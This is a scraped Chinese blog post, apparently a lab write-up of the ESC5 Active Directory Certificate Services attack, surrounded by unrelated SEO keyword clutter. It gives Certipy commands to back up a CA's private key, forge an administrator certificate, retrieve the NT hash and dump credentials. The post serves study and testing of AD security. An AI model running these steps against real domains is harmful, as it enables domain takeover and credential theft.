2026/1/14 3:43:46
网站建设
项目流程
网站关键词百度首页消失,企业软件网站建设,网站更换目录名如何做301跳转,辽宁建设工程信息网入辽备案被锁定摘要
继我之前写的ESC4文章之后——现在我的工作完成了#xff0c;终于有更多时间学习#xff0c;我想我也要深入研究一下ESC5。说实话#xff0c;我不知道为什么#xff0c;但学习活动目录(Active Directory)利用感觉起来更令人兴奋#xff0c;尽管在印度尼西亚的真实环境…摘要继我之前写的ESC4文章之后——现在我的工作完成了终于有更多时间学习我想我也要深入研究一下ESC5。说实话我不知道为什么但学习活动目录(Active Directory)利用感觉起来更令人兴奋尽管在印度尼西亚的真实环境中仍然相当罕见。可能只是我理想主义的一面吧哈哈哈。好了让我们开始一起学习吧。什么是ESC5ESC5是一种针对活动目录证书服务(ADCS)的攻击。这种攻击利用了对证书颁发机构(CA)的访问权限。如果攻击者获得了CA服务器上的本地管理员权限就可以提取CA证书及其私钥。利用该私钥攻击者可以为特权账户如域管理员伪造恶意证书。然后这些伪造的证书可用于通过PKINIT向AD进行身份验证并请求TGT票据授予票据。搭建实验室创建一个任意名称的账户并将该账户添加为CA服务器(DC01)上的本地管理员net localgroup Administratorsigniteraj/add net localgroup Administrators按回车或点击查看完整大小的图片枚举与利用使用Certipy在CA服务器上以本地管理员账户枚举证书。按回车或点击查看完整大小的图片按回车或点击查看完整大小的图片使用Certipy备份CA证书和私钥。certipy ca -backup -u alex.doesandbox.local -pMyPassword123-ca ignite-DC-CA -target10.100.150.10伪造我们想要接管的账户——在本例中是administratorsandbox.local因为它是我的目标上的域管理员。certipy forge -ca-pfxsandbox-ca.pfx-upn administratorsandbox.local使用Certipy获取administratorsandbox.local账户的NT哈希。certipy auth -pfx administrator_forged.pfx -dc-ip10.100.150.10按回车或点击查看完整大小的图片按回车或点击查看完整大小的图片使用SecretDump导出哈希凭据。按回车或点击查看完整大小的图片参考资料https://www.hackingarticles.in/ad-cs-esc5-vulnerable-pki-object-access-control/https://mayfly277.github.io/posts/ADCS-part14/https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享